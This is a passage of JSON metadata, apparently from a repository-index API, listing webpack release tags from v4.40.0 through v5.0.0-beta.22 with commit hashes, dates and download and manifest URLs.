g:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G